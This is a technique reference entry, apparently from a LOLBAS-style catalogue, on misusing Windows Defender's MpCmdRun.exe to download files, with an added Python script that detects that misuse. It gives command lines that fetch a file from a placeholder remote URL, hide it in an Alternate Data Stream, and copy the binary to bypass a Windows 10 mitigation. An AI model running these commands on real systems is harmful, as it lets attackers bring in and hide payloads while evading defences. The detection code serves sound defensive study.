MpCmdRun.exe

A binary that is part of Windows Defender, used to manage Windows Defender settings.

ADS

Hide downloaded data in an Alternate Data Stream

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe

Download a file to the machine and store it in an Alternate Data Stream — MITRE: T1564.004 — Privileges: User

Download

Download file

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}

Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). — MITRE: T1105 — Privileges: User

Download file

copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe

Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation. — MITRE: T1105 — Privileges: User
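
For detection, the three usages above can be matched in process-creation telemetry. The following is an added example, not part of the original entry: it assumes events are available as (image path, command line) pairs, and the trusted install directories, the classify function and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Directories where a genuine MpCmdRun.exe normally lives (assumed defaults).
TRUSTED_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)

def _switch(name):
    # The entry notes that slashes work as well as dashes, so accept both.
    return re.compile(r"(?<!\S)[-/]" + name + r"(?!\S)", re.IGNORECASE)

DOWNLOAD, URL = _switch("DownloadFile"), _switch("url")
PATH_ARG = re.compile(r'(?<!\S)[-/]path\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

def classify(image, command_line):
    """Return a list of findings for one process-creation event."""
    findings = []
    if not (DOWNLOAD.search(command_line) and URL.search(command_line)):
        return findings
    findings.append("T1105 download via MpCmdRun switches")
    m = PATH_ARG.search(command_line)
    target = (m.group(1) or m.group(2)) if m else ""
    # Any colon after the drive-letter colon names an Alternate Data Stream.
    if ":" in target[2:]:
        findings.append("T1564.004 output path targets an ADS")
    # Matching on switches, not the file name, also catches a copied binary.
    folder, name = ntpath.split(image.lower())
    if name != "mpcmdrun.exe" or not folder.startswith(TRUSTED_DIRS):
        findings.append("switches used by a renamed or relocated binary")
    return findings

# Constructed sample events (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r"MpCmdRun.exe -Scan -ScanType 1"),
    (r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r"MpCmdRun.exe /DownloadFile /url https://example.test/a.exe /path C:\Temp\a.exe"),
    (r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     r"MpCmdRun.exe -DownloadFile -url https://example.test/a.exe -path C:\Temp\a.txt:s.exe"),
    (r"C:\Users\Public\Downloads\MP.exe",
     r'"C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://example.test/a.exe -path C:\Temp\a.exe'),
]

if __name__ == "__main__":
    for image, cmd in SAMPLE_EVENTS:
        print(ntpath.basename(image), "->", classify(image, cmd) or "no finding")
```

Because Defender itself runs MpCmdRun.exe for scans and updates, alerting on the DownloadFile switch combination rather than on the process name keeps routine activity out of the results.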